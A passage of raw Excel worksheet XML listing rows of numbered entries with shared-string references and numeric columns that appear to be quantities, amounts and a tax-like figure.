      <c r="D2509" s="238" t="s">
        <v>11716</v>
      </c>
      <c r="E2509" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2509" s="238" t="s">
        <v>11717</v>
      </c>
      <c r="G2509" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2509" s="10">
        <v>2</v>
      </c>
      <c r="I2509" s="14">
        <v>4615.38</v>
      </c>
      <c r="J2509" s="15">
        <v>738.4608</v>
      </c>
      <c r="K2509" s="16"/>
    </row>
    <row r="2510" spans="2:11">
      <c r="B2510" s="9">
        <v>2544</v>
      </c>
      <c r="C2510" s="238" t="s">
        <v>11718</v>
      </c>
      <c r="D2510" s="238" t="s">
        <v>11719</v>
      </c>
      <c r="E2510" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2510" s="238" t="s">
        <v>11720</v>
      </c>
      <c r="G2510" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2510" s="10">
        <v>8</v>
      </c>
      <c r="I2510" s="14">
        <v>12923.08</v>
      </c>
      <c r="J2510" s="15">
        <v>2067.6992</v>
      </c>
      <c r="K2510" s="16"/>
    </row>
    <row r="2511" spans="2:11">
      <c r="B2511" s="9">
        <v>2545</v>
      </c>
      <c r="C2511" s="238" t="s">
        <v>11721</v>
      </c>
      <c r="D2511" s="238" t="s">
        <v>11722</v>
      </c>
      <c r="E2511" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F2511" s="238" t="s">
        <v>11567</v>
      </c>
      <c r="G2511" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2511" s="10">
        <v>19</v>
      </c>
      <c r="I2511" s="14">
        <v>6199.72</v>
      </c>
      <c r="J2511" s="15">
        <v>991.952</v>
      </c>
      <c r="K2511" s="16"/>
    </row>
    <row r="2512" spans="2:11">
      <c r="B2512" s="9">
        <v>2546</v>
      </c>
      <c r="C2512" s="238" t="s">
        <v>11723</v>
      </c>
      <c r="D2512" s="238" t="s">
        <v>11724</v>
      </c>
      <c r="E2512" s="238" t="s">
        <v>7818</v>
      </c>
      <c r="F2512" s="238" t="s">
        <v>11725</v>
      </c>
      <c r="G2512" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H2512" s="10">
        <v>118</v>
      </c>
      <c r="I2512" s="14">
        <v>21132.89</v>
      </c>
      <c r="J2512" s="15">
        <v>3381.2192</v>
      </c>
      <c r="K2512" s="16"/>
    </row>
    <row r="2513" spans="2:11">
      <c r="B2513" s="9">
        <v>2547</v>
      </c>
      <c r="C2513" s="238" t="s">
        <v>11726</v>
      </c>
      <c r="D2513" s="9"/>
      <c r="E2513" s="238" t="s">
        <v>11727</v>
      </c>
      <c r="F2513" s="238" t="s">
        <v>11567</v>
      </c>
      <c r="G2513" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2513" s="10">
        <v>2</v>
      </c>
      <c r="I2513" s="14">
        <v>1119.66</v>
      </c>
      <c r="J2513" s="15">
        <v>179.1456</v>
      </c>
      <c r="K2513" s="16"/>
    </row>
    <row r="2514" spans="2:11">
      <c r="B2514" s="9">
        <v>2548</v>
      </c>
      <c r="C2514" s="238" t="s">
        <v>11728</v>
      </c>
      <c r="D2514" s="238" t="s">
        <v>11729</v>
      </c>
      <c r="E2514" s="238" t="s">
        <v>11730</v>
      </c>
      <c r="F2514" s="238" t="s">
        <v>11731</v>
      </c>
      <c r="G2514" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2514" s="10">
        <v>40</v>
      </c>
      <c r="I2514" s="14">
        <v>44.19</v>
      </c>
      <c r="J2514" s="15">
        <v>7.04</v>
      </c>
      <c r="K2514" s="16"/>
    </row>
    <row r="2515" spans="2:11">
      <c r="B2515" s="9">
        <v>2549</v>
      </c>
      <c r="C2515" s="238" t="s">
        <v>11732</v>
      </c>
      <c r="D2515" s="238" t="s">
        <v>11733</v>
      </c>
      <c r="E2515" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2515" s="238" t="s">
        <v>11734</v>
      </c>
      <c r="G2515" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2515" s="10">
        <v>2</v>
      </c>
      <c r="I2515" s="14">
        <v>1374.62</v>
      </c>
      <c r="J2515" s="15">
        <v>219.9392</v>
      </c>
      <c r="K2515" s="16"/>
    </row>
    <row r="2516" spans="2:11">
      <c r="B2516" s="9">
        <v>2550</v>
      </c>
      <c r="C2516" s="238" t="s">
        <v>11735</v>
      </c>
      <c r="D2516" s="238" t="s">
        <v>11736</v>
      </c>
      <c r="E2516" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2516" s="238" t="s">
        <v>11737</v>
      </c>
      <c r="G2516" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2516" s="10">
        <v>4</v>
      </c>
      <c r="I2516" s="14">
        <v>7692.31</v>
      </c>
      <c r="J2516" s="15">
        <v>1230.7712</v>
      </c>
      <c r="K2516" s="16"/>
    </row>
    <row r="2517" spans="2:11">
      <c r="B2517" s="9">
        <v>2551</v>
      </c>
      <c r="C2517" s="238" t="s">
        <v>11738</v>
      </c>
      <c r="D2517" s="238" t="s">
        <v>11739</v>
      </c>
      <c r="E2517" s="238" t="s">
        <v>11740</v>
      </c>
      <c r="F2517" s="238" t="s">
        <v>11741</v>
      </c>
      <c r="G2517" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2517" s="10">
        <v>1</v>
      </c>
      <c r="I2517" s="14">
        <v>9100</v>
      </c>
      <c r="J2517" s="15">
        <v>1456</v>
      </c>
      <c r="K2517" s="16"/>
    </row>
    <row r="2518" spans="2:11">
      <c r="B2518" s="9">
        <v>2552</v>
      </c>
      <c r="C2518" s="238" t="s">
        <v>11742</v>
      </c>
      <c r="D2518" s="238" t="s">
        <v>11743</v>
      </c>
      <c r="E2518" s="238" t="s">
        <v>5242</v>
      </c>
      <c r="F2518" s="9"/>
      <c r="G2518" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2518" s="10">
        <v>1</v>
      </c>
      <c r="I2518" s="14">
        <v>1441.54</v>
      </c>
      <c r="J2518" s="15">
        <v>230.6464</v>
      </c>
      <c r="K2518" s="16"/>
    </row>
    <row r="2519" spans="2:11">
      <c r="B2519" s="9">
        <v>2553</v>
      </c>
      <c r="C2519" s="238" t="s">
        <v>11744</v>
      </c>
      <c r="D2519" s="238" t="s">
        <v>9564</v>
      </c>
      <c r="E2519" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2519" s="9"/>
      <c r="G2519" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2519" s="10">
        <v>45</v>
      </c>
      <c r="I2519" s="14">
        <v>3366.67</v>
      </c>
      <c r="J2519" s="15">
        <v>538.632</v>
      </c>
      <c r="K2519" s="16"/>
    </row>
    <row r="2520" spans="2:11">
      <c r="B2520" s="9">
        <v>2554</v>
      </c>
      <c r="C2520" s="238" t="s">
        <v>11745</v>
      </c>
      <c r="D2520" s="238" t="s">
        <v>11746</v>
      </c>
      <c r="E2520" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F2520" s="238" t="s">
        <v>11747</v>
      </c>
      <c r="G2520" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2520" s="10">
        <v>6</v>
      </c>
      <c r="I2520" s="14">
        <v>1671.79</v>
      </c>
      <c r="J2520" s="15">
        <v>267.4848</v>
      </c>
      <c r="K2520" s="16"/>
    </row>
    <row r="2521" spans="2:11">
      <c r="B2521" s="9">
        <v>2555</v>
      </c>
      <c r="C2521" s="238" t="s">
        <v>11748</v>
      </c>
      <c r="D2521" s="238" t="s">
        <v>11749</v>
      </c>
      <c r="E2521" s="238" t="s">
        <v>11492</v>
      </c>
      <c r="F2521" s="238" t="s">
        <v>11750</v>
      </c>
      <c r="G2521" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2521" s="10">
        <v>2</v>
      </c>
      <c r="I2521" s="14">
        <v>3760.68</v>
      </c>
      <c r="J2521" s="15">
        <v>601.7088</v>
      </c>
      <c r="K2521" s="16"/>
    </row>
    <row r="2522" spans="2:11">
      <c r="B2522" s="9">
        <v>2556</v>
      </c>
      <c r="C2522" s="238" t="s">
        <v>11751</v>
      </c>
      <c r="D2522" s="238" t="s">
        <v>11752</v>
      </c>
      <c r="E2522" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F2522" s="238" t="s">
        <v>11753</v>
      </c>
      <c r="G2522" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2522" s="10">
        <v>1</v>
      </c>
      <c r="I2522" s="14">
        <v>615.38</v>
      </c>
      <c r="J2522" s="15">
        <v>98.4608</v>
      </c>
      <c r="K2522" s="16"/>
    </row>
    <row r="2523" spans="2:11">
      <c r="B2523" s="9">
        <v>2557</v>
      </c>
      <c r="C2523" s="238" t="s">
        <v>11754</v>
      </c>
      <c r="D2523" s="238" t="s">
        <v>11755</v>
      </c>
      <c r="E2523" s="238" t="s">
        <v>11756</v>
      </c>
      <c r="F2523" s="238" t="s">
        <v>11757</v>
      </c>
      <c r="G2523" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2523" s="10">
        <v>1</v>
      </c>
      <c r="I2523" s="14">
        <v>14358.97</v>
      </c>
      <c r="J2523" s="15">
        <v>2297.4352</v>
      </c>
      <c r="K2523" s="16"/>
    </row>
    <row r="2524" spans="2:11">
      <c r="B2524" s="9">
        <v>2558</v>
      </c>
      <c r="C2524" s="238" t="s">
        <v>11758</v>
      </c>
      <c r="D2524" s="238" t="s">
        <v>11759</v>
      </c>
      <c r="E2524" s="238" t="s">
        <v>11760</v>
      </c>
      <c r="F2524" s="238" t="s">
        <v>11761</v>
      </c>
      <c r="G2524" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2524" s="10">
        <v>1</v>
      </c>
      <c r="I2524" s="14">
        <v>11965.81</v>
      </c>
      <c r="J2524" s="15">
        <v>1914.5296</v>
      </c>
      <c r="K2524" s="16"/>
    </row>
    <row r="2525" spans="2:11">
      <c r="B2525" s="9">
        <v>2559</v>
      </c>
      <c r="C2525" s="238" t="s">
        <v>11762</v>
      </c>
      <c r="D2525" s="238" t="s">
        <v>6718</v>
      </c>
      <c r="E2525" s="238" t="s">
        <v>11763</v>
      </c>
      <c r="F2525" s="238" t="s">
        <v>11764</v>
      </c>
      <c r="G2525" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2525" s="10">
        <v>2</v>
      </c>
      <c r="I2525" s="14">
        <v>31196.58</v>
      </c>
      <c r="J2525" s="15">
        <v>4991.4528</v>
      </c>
      <c r="K2525" s="16"/>
    </row>
    <row r="2526" spans="2:11">
      <c r="B2526" s="9">
        <v>2560</v>
      </c>
      <c r="C2526" s="238" t="s">
        <v>11765</v>
      </c>
      <c r="D2526" s="238" t="s">
        <v>11766</v>
      </c>
      <c r="E2526" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F2526" s="238" t="s">
        <v>11767</v>
      </c>
      <c r="G2526" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2526" s="10">
        <v>7</v>
      </c>
      <c r="I2526" s="14">
        <v>1735.03</v>
      </c>
      <c r="J2526" s="15">
        <v>277.6032</v>
      </c>
      <c r="K2526" s="16"/>
    </row>
    <row r="2527" spans="2:11">
      <c r="B2527" s="9">
        <v>2561</v>
      </c>
      <c r="C2527" s="238" t="s">
        <v>11768</v>
      </c>
      <c r="D2527" s="238" t="s">
        <v>11769</v>
      </c>
      <c r="E2527" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F2527" s="238" t="s">
        <v>11770</v>
      </c>
      <c r="G2527" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2527" s="10">
        <v>1</v>
      </c>
      <c r="I2527" s="14">
        <v>4758.41</v>
      </c>
      <c r="J2527" s="15">
        <v>761.3456</v>
      </c>
      <c r="K2527" s="16"/>
    </row>
    <row r="2528" spans="2:11">
      <c r="B2528" s="9">
        <v>2562</v>
      </c>
      <c r="C2528" s="238" t="s">
        <v>11771</v>
      </c>
      <c r="D2528" s="238" t="s">
        <v>11772</v>
      </c>
      <c r="E2528" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F2528" s="238" t="s">
        <v>11773</v>
      </c>
      <c r="G2528" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2528" s="10">
        <v>14</v>
      </c>
      <c r="I2528" s="14">
        <v>27.92</v>
      </c>
      <c r="J2528" s="15">
        <v>11.144</v>
      </c>
      <c r="K2528" s="16"/>
    </row>
    <row r="2529" spans="2:11">
      <c r="B2529" s="9">
        <v>2563</v>
      </c>
      <c r="C2529" s="238" t="s">
        <v>11774</v>
      </c>
      <c r="D2529" s="238" t="s">
        <v>11775</v>
      </c>
      <c r="E2529" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2529" s="238" t="s">
        <v>11776</v>
      </c>
      <c r="G2529" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2529" s="10">
        <v>4</v>
      </c>
      <c r="I2529" s="14">
        <v>3.4</v>
      </c>
      <c r="J2529" s="15">
        <v>1.36</v>
      </c>
      <c r="K2529" s="16"/>
    </row>
    <row r="2530" spans="2:11">
      <c r="B2530" s="9">
        <v>2564</v>
      </c>
      <c r="C2530" s="238" t="s">
        <v>11777</v>
      </c>
      <c r="D2530" s="238" t="s">
        <v>11778</v>
      </c>
      <c r="E2530" s="238" t="s">
        <v>7870</v>
      </c>
      <c r="F2530" s="238" t="s">
        <v>11779</v>
      </c>
      <c r="G2530" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2530" s="10">
        <v>2</v>
      </c>
      <c r="I2530" s="14">
        <v>441.39</v>
      </c>
      <c r="J2530" s="15">
        <v>70.624</v>
      </c>
      <c r="K2530" s="16"/>
    </row>
    <row r="2531" spans="2:11">
      <c r="B2531" s="9">
        <v>2565</v>
      </c>
      <c r="C2531" s="238" t="s">
        <v>11780</v>
      </c>
      <c r="D2531" s="238" t="s">
        <v>11781</v>
      </c>
      <c r="E2531" s="238" t="s">
        <v>11782</v>
      </c>
      <c r="F2531" s="238" t="s">
        <v>11783</v>
      </c>
      <c r="G2531" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2531" s="10">
        <v>1</v>
      </c>
      <c r="I2531" s="14">
        <v>606.84</v>
      </c>
      <c r="J2531" s="15">
        <v>97.0944</v>
      </c>
      <c r="K2531" s="16"/>
    </row>
    <row r="2532" spans="2:11">
      <c r="B2532" s="9">
        <v>2566</v>
      </c>
      <c r="C2532" s="238" t="s">
        <v>11784</v>
      </c>
      <c r="D2532" s="238" t="s">
        <v>11785</v>
      </c>
      <c r="E2532" s="238" t="s">
        <v>11786</v>
      </c>
      <c r="F2532" s="238" t="s">
        <v>11787</v>
      </c>
      <c r="G2532" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2532" s="10">
        <v>3</v>
      </c>
      <c r="I2532" s="14">
        <v>8859.64</v>
      </c>
      <c r="J2532" s="15">
        <v>1417.5408</v>
      </c>
      <c r="K2532" s="16"/>
    </row>
    <row r="2533" spans="2:11">
      <c r="B2533" s="9">
        <v>2567</v>
      </c>
      <c r="C2533" s="238" t="s">
        <v>11788</v>
      </c>
      <c r="D2533" s="238" t="s">
        <v>11789</v>
      </c>
      <c r="E2533" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F2533" s="238" t="s">
        <v>11790</v>
      </c>
      <c r="G2533" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2533" s="10">
        <v>2</v>
      </c>
      <c r="I2533" s="14">
        <v>76.93</v>
      </c>
      <c r="J2533" s="15">
        <v>12.3104</v>
      </c>
      <c r="K2533" s="16"/>
    </row>
    <row r="2534" spans="2:11">
      <c r="B2534" s="9">
        <v>2568</v>
      </c>
      <c r="C2534" s="238" t="s">
        <v>11791</v>
      </c>
      <c r="D2534" s="238" t="s">
        <v>11792</v>
      </c>
      <c r="E2534" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2534" s="238" t="s">
        <v>11793</v>
      </c>
      <c r="G2534" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2534" s="10">
        <v>200</v>
      </c>
      <c r="I2534" s="14">
        <v>514.05</v>
      </c>
      <c r="J2534" s="15">
        <v>82.24</v>
      </c>
      <c r="K2534" s="16"/>
    </row>
    <row r="2535" spans="2:11">
      <c r="B2535" s="9">
        <v>2569</v>
      </c>
      <c r="C2535" s="238" t="s">
        <v>11794</v>
      </c>
      <c r="D2535" s="238" t="s">
        <v>5317</v>
      </c>
      <c r="E2535" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2535" s="238" t="s">
        <v>11795</v>
      </c>
      <c r="G2535" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2535" s="10">
        <v>1</v>
      </c>
      <c r="I2535" s="14">
        <v>213.67</v>
      </c>
      <c r="J2535" s="15">
        <v>34.1872</v>
      </c>
      <c r="K2535" s="16"/>
    </row>
    <row r="2536" spans="2:11">
      <c r="B2536" s="9">
        <v>2570</v>
      </c>
      <c r="C2536" s="238" t="s">
        <v>11796</v>
      </c>
      <c r="D2536" s="238" t="s">
        <v>11797</v>
      </c>
      <c r="E2536" s="238" t="s">
        <v>11798</v>
      </c>
      <c r="F2536" s="238" t="s">
        <v>11799</v>
      </c>
      <c r="G2536" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2536" s="10">
        <v>10</v>
      </c>
      <c r="I2536" s="14">
        <v>487.18</v>
      </c>
      <c r="J2536" s="15">
        <v>77.952</v>
      </c>
      <c r="K2536" s="16"/>
    </row>
    <row r="2537" spans="2:11">
      <c r="B2537" s="9">
        <v>2571</v>
      </c>
      <c r="C2537" s="238" t="s">
        <v>11800</v>
      </c>
      <c r="D2537" s="238" t="s">
        <v>11801</v>
      </c>
      <c r="E2537" s="238" t="s">
        <v>11196</v>
      </c>
      <c r="F2537" s="238" t="s">
        <v>11802</v>
      </c>
      <c r="G2537" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2537" s="10">
        <v>2</v>
      </c>
      <c r="I2537" s="14">
        <v>66.67</v>
      </c>
      <c r="J2537" s="15">
        <v>10.6688</v>
      </c>
      <c r="K2537" s="16"/>
    </row>
    <row r="2538" spans="2:11">
      <c r="B2538" s="9">
        <v>2572</v>
      </c>
      <c r="C2538" s="238" t="s">
        <v>11803</v>
      </c>
      <c r="D2538" s="238" t="s">
        <v>8462</v>
      </c>
      <c r="E2538" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2538" s="238" t="s">
        <v>11804</v>
      </c>
      <c r="G2538" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2538" s="10">
        <v>27</v>
      </c>
      <c r="I2538" s="14">
        <v>300.03</v>
      </c>
      <c r="J2538" s="15">
        <v>47.9952</v>
      </c>
      <c r="K2538" s="16"/>
    </row>
    <row r="2539" spans="2:11">
      <c r="B2539" s="9">
        <v>2573</v>
      </c>
      <c r="C2539" s="238" t="s">
        <v>11805</v>
      </c>
      <c r="D2539" s="238" t="s">
        <v>11806</v>
      </c>
      <c r="E2539" s="238" t="s">
        <v>11807</v>
      </c>
      <c r="F2539" s="238" t="s">
        <v>11808</v>
      </c>
      <c r="G2539" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2539" s="10">
        <v>10</v>
      </c>
      <c r="I2539" s="14">
        <v>504.27</v>
      </c>
      <c r="J2539" s="15">
        <v>80.688</v>
      </c>
      <c r="K2539" s="16"/>
    </row>
    <row r="2540" spans="2:11">
      <c r="B2540" s="9">
        <v>2574</v>
      </c>
      <c r="C2540" s="238" t="s">
        <v>11809</v>
      </c>
      <c r="D2540" s="238" t="s">
        <v>11810</v>
      </c>
      <c r="E2540" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2540" s="238" t="s">
        <v>11811</v>
      </c>
      <c r="G2540" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2540" s="10">
        <v>20</v>
      </c>
      <c r="I2540" s="14">
        <v>20.58</v>
      </c>
      <c r="J2540" s="15">
        <v>3.296</v>
      </c>
      <c r="K2540" s="16"/>
    </row>
    <row r="2541" spans="2:11">
      <c r="B2541" s="9">
        <v>2575</v>
      </c>
      <c r="C2541" s="238" t="s">
        <v>11812</v>
      </c>
      <c r="D2541" s="238" t="s">
        <v>11813</v>
      </c>
      <c r="E2541" s="238" t="s">
        <v>11131</v>
      </c>
      <c r="F2541" s="238" t="s">
        <v>11814</v>
      </c>
      <c r="G2541" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2541" s="10">
        <v>4</v>
      </c>
      <c r="I2541" s="14">
        <v>68.4</v>
      </c>
      <c r="J2541" s="15">
        <v>10.944</v>
      </c>
      <c r="K2541" s="16"/>
    </row>
    <row r="2542" spans="2:11">
      <c r="B2542" s="9">
        <v>2576</v>
      </c>
      <c r="C2542" s="238" t="s">
        <v>11815</v>
      </c>
      <c r="D2542" s="238" t="s">
        <v>11816</v>
      </c>
      <c r="E2542" s="238" t="s">
        <v>11817</v>
      </c>
      <c r="F2542" s="238" t="s">
        <v>11818</v>
      </c>
      <c r="G2542" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2542" s="10">
        <v>82</v>
      </c>
      <c r="I2542" s="14">
        <v>5087.53</v>
      </c>
      <c r="J2542" s="15">
        <v>813.9648</v>
      </c>
      <c r="K2542" s="16"/>
    </row>
    <row r="2543" spans="2:11">
      <c r="B2543" s="9">
        <v>2577</v>
      </c>
      <c r="C2543" s="238" t="s">
        <v>11819</v>
      </c>
      <c r="D2543" s="238" t="s">
        <v>11820</v>
      </c>
      <c r="E2543" s="238" t="s">
        <v>11821</v>
      </c>
      <c r="F2543" s="238" t="s">
        <v>11822</v>
      </c>
      <c r="G2543" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2543" s="10">
        <v>96</v>
      </c>
      <c r="I2543" s="14">
        <v>397.69</v>
      </c>
      <c r="J2543" s="15">
        <v>63.5904</v>
      </c>
      <c r="K2543" s="16"/>
    </row>
    <row r="2544" spans="2:11">
      <c r="B2544" s="9">
        <v>2578</v>
      </c>
      <c r="C2544" s="238" t="s">
        <v>11823</v>
      </c>
      <c r="D2544" s="238" t="s">
        <v>11824</v>
      </c>
      <c r="E2544" s="238" t="s">
        <v>7399</v>
      </c>
      <c r="F2544" s="238" t="s">
        <v>11825</v>
      </c>
      <c r="G2544" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2544" s="10">
        <v>20</v>
      </c>
      <c r="I2544" s="14">
        <v>9.58</v>
      </c>
      <c r="J2544" s="15">
        <v>1.536</v>
      </c>
      <c r="K2544" s="16"/>
    </row>
    <row r="2545" spans="2:11">
      <c r="B2545" s="9">
        <v>2579</v>
      </c>
      <c r="C2545" s="238" t="s">
        <v>11826</v>
      </c>
      <c r="D2545" s="238" t="s">
        <v>11827</v>
      </c>
      <c r="E2545" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2545" s="238" t="s">
        <v>11828</v>
      </c>
      <c r="G2545" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2545" s="10">
        <v>4</v>
      </c>
      <c r="I2545" s="14">
        <v>41.03</v>
      </c>
      <c r="J2545" s="15">
        <v>16.416</v>
      </c>
      <c r="K2545" s="16"/>
    </row>
    <row r="2546" spans="2:11">
      <c r="B2546" s="9">
        <v>2580</v>
      </c>
      <c r="C2546" s="238" t="s">
        <v>11829</v>
      </c>
      <c r="D2546" s="238" t="s">
        <v>6795</v>
      </c>
      <c r="E2546" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F2546" s="238" t="s">
        <v>11830</v>
      </c>
      <c r="G2546" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2546" s="10">
        <v>2</v>
      </c>
      <c r="I2546" s="14">
        <v>28542.73</v>
      </c>
      <c r="J2546" s="15">
        <v>4566.8384</v>
      </c>
      <c r="K2546" s="16"/>
    </row>
    <row r="2547" spans="2:11">
      <c r="B2547" s="9">
        <v>2581</v>
      </c>
      <c r="C2547" s="238" t="s">
        <v>11831</v>
      </c>
      <c r="D2547" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E2547" s="238" t="s">
        <v>9024</v>
      </c>
      <c r="F2547" s="238" t="s">
        <v>11832</v>
      </c>
      <c r="G2547" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2547" s="10">
        <v>1</v>
      </c>
      <c r="I2547" s="14">
        <v>1050.85</v>
      </c>
      <c r="J2547" s="15">
        <v>168.136</v>
      </c>
      <c r="K2547" s="16"/>
    </row>
    <row r="2548" spans="2:11">
      <c r="B2548" s="9">
        <v>2582</v>
      </c>
      <c r="C2548" s="238" t="s">
        <v>11833</v>
      </c>
      <c r="D2548" s="238" t="s">
        <v>11834</v>
      </c>
      <c r="E2548" s="238" t="s">
        <v>8300</v>
      </c>
      <c r="F2548" s="238" t="s">
        <v>11835</v>
      </c>
      <c r="G2548" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2548" s="10">
        <v>6</v>
      </c>
      <c r="I2548" s="14">
        <v>2712.8</v>
      </c>
      <c r="J2548" s="15">
        <v>1085.112</v>
      </c>
      <c r="K2548" s="16"/>
    </row>
    <row r="2549" spans="2:11">
      <c r="B2549" s="9">
        <v>2583</v>
      </c>
      <c r="C2549" s="238" t="s">
        <v>11836</v>
      </c>
      <c r="D2549" s="238" t="s">
        <v>7770</v>
      </c>
      <c r="E2549" s="238" t="s">
        <v>7771</v>
      </c>
      <c r="F2549" s="238" t="s">
        <v>11837</v>
      </c>
      <c r="G2549" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2549" s="10">
        <v>4</v>
      </c>
      <c r="I2549" s="14">
        <v>559.24</v>
      </c>
      <c r="J2549" s="15">
        <v>223.696</v>
      </c>
      <c r="K2549" s="16"/>
    </row>
    <row r="2550" spans="2:11">
      <c r="B2550" s="9">
        <v>2584</v>
      </c>
      <c r="C2550" s="238" t="s">
        <v>11838</v>
      </c>
      <c r="D2550" s="238" t="s">
        <v>11839</v>
      </c>
      <c r="E2550" s="238" t="s">
        <v>11840</v>
      </c>
      <c r="F2550" s="238" t="s">
        <v>11841</v>
      </c>
      <c r="G2550" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2550" s="10">
        <v>4</v>
      </c>
      <c r="I2550" s="14">
        <v>3846.15</v>
      </c>
      <c r="J2550" s="15">
        <v>615.3856</v>
      </c>
      <c r="K2550" s="16"/>
    </row>
    <row r="2551" spans="2:11">
      <c r="B2551" s="9">
        <v>2585</v>
      </c>
      <c r="C2551" s="238" t="s">
        <v>11842</v>
      </c>
      <c r="D2551" s="238" t="s">
        <v>11843</v>
      </c>
      <c r="E2551" s="238" t="s">
        <v>11844</v>
      </c>
      <c r="F2551" s="238" t="s">
        <v>11845</v>
      </c>
      <c r="G2551" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2551" s="10">
        <v>2</v>
      </c>
      <c r="I2551" s="14">
        <v>6743.59</v>
      </c>
      <c r="J2551" s="15">
        <v>1078.976</v>
      </c>
      <c r="K2551" s="16"/>
    </row>
    <row r="2552" spans="2:11">
      <c r="B2552" s="9">
        <v>2586</v>
      </c>
      <c r="C2552" s="238" t="s">
        <v>11846</v>
      </c>
      <c r="D2552" s="9"/>
      <c r="E2552" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2552" s="238" t="s">
        <v>11847</v>
      </c>
      <c r="G2552" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2552" s="10">
        <v>50</v>
      </c>
      <c r="I2552" s="14">
        <v>683.76</v>
      </c>
      <c r="J2552" s="15">
        <v>109.44</v>
      </c>
      <c r="K2552" s="16"/>
    </row>
    <row r="2553" spans="2:11">
      <c r="B2553" s="9">
        <v>2587</v>
      </c>
      <c r="C2553" s="238" t="s">
        <v>11848</v>
      </c>
      <c r="D2553" s="238" t="s">
        <v>5536</v>
      </c>
      <c r="E2553" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2553" s="238" t="s">
        <v>11849</v>
      </c>
      <c r="G2553" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2553" s="10">
        <v>7</v>
      </c>
      <c r="I2553" s="14">
        <v>41.84</v>
      </c>
      <c r="J2553" s="15">
        <v>6.6976</v>
      </c>
      <c r="K2553" s="16"/>
    </row>
    <row r="2554" spans="2:11">
      <c r="B2554" s="9">
        <v>2588</v>
      </c>
      <c r="C2554" s="238" t="s">
        <v>11850</v>
      </c>
      <c r="D2554" s="238" t="s">
        <v>4921</v>
      </c>
      <c r="E2554" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2554" s="238" t="s">
        <v>11851</v>
      </c>
      <c r="G2554" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2554" s="10">
        <v>5</v>
      </c>
      <c r="I2554" s="14">
        <v>38.46</v>
      </c>
      <c r="J2554" s="15">
        <v>6.152</v>
      </c>
      <c r="K2554" s="16"/>
    </row>
    <row r="2555" spans="2:11">
      <c r="B2555" s="9">
        <v>2589</v>
      </c>
      <c r="C2555" s="238" t="s">
        <v>11852</v>
      </c>
      <c r="D2555" s="238" t="s">
        <v>11853</v>
      </c>
      <c r="E2555" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2555" s="238" t="s">
        <v>7901</v>
      </c>
      <c r="G2555" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2555" s="10">
        <v>4</v>
      </c>
      <c r="I2555" s="14">
        <v>51.2</v>
      </c>
      <c r="J2555" s="15">
        <v>8.192</v>
      </c>
      <c r="K2555" s="16"/>
    </row>
    <row r="2556" spans="2:11">
      <c r="B2556" s="9">
        <v>2590</v>
      </c>
      <c r="C2556" s="238" t="s">
        <v>11854</v>
      </c>
      <c r="D2556" s="238" t="s">
        <v>11855</v>
      </c>
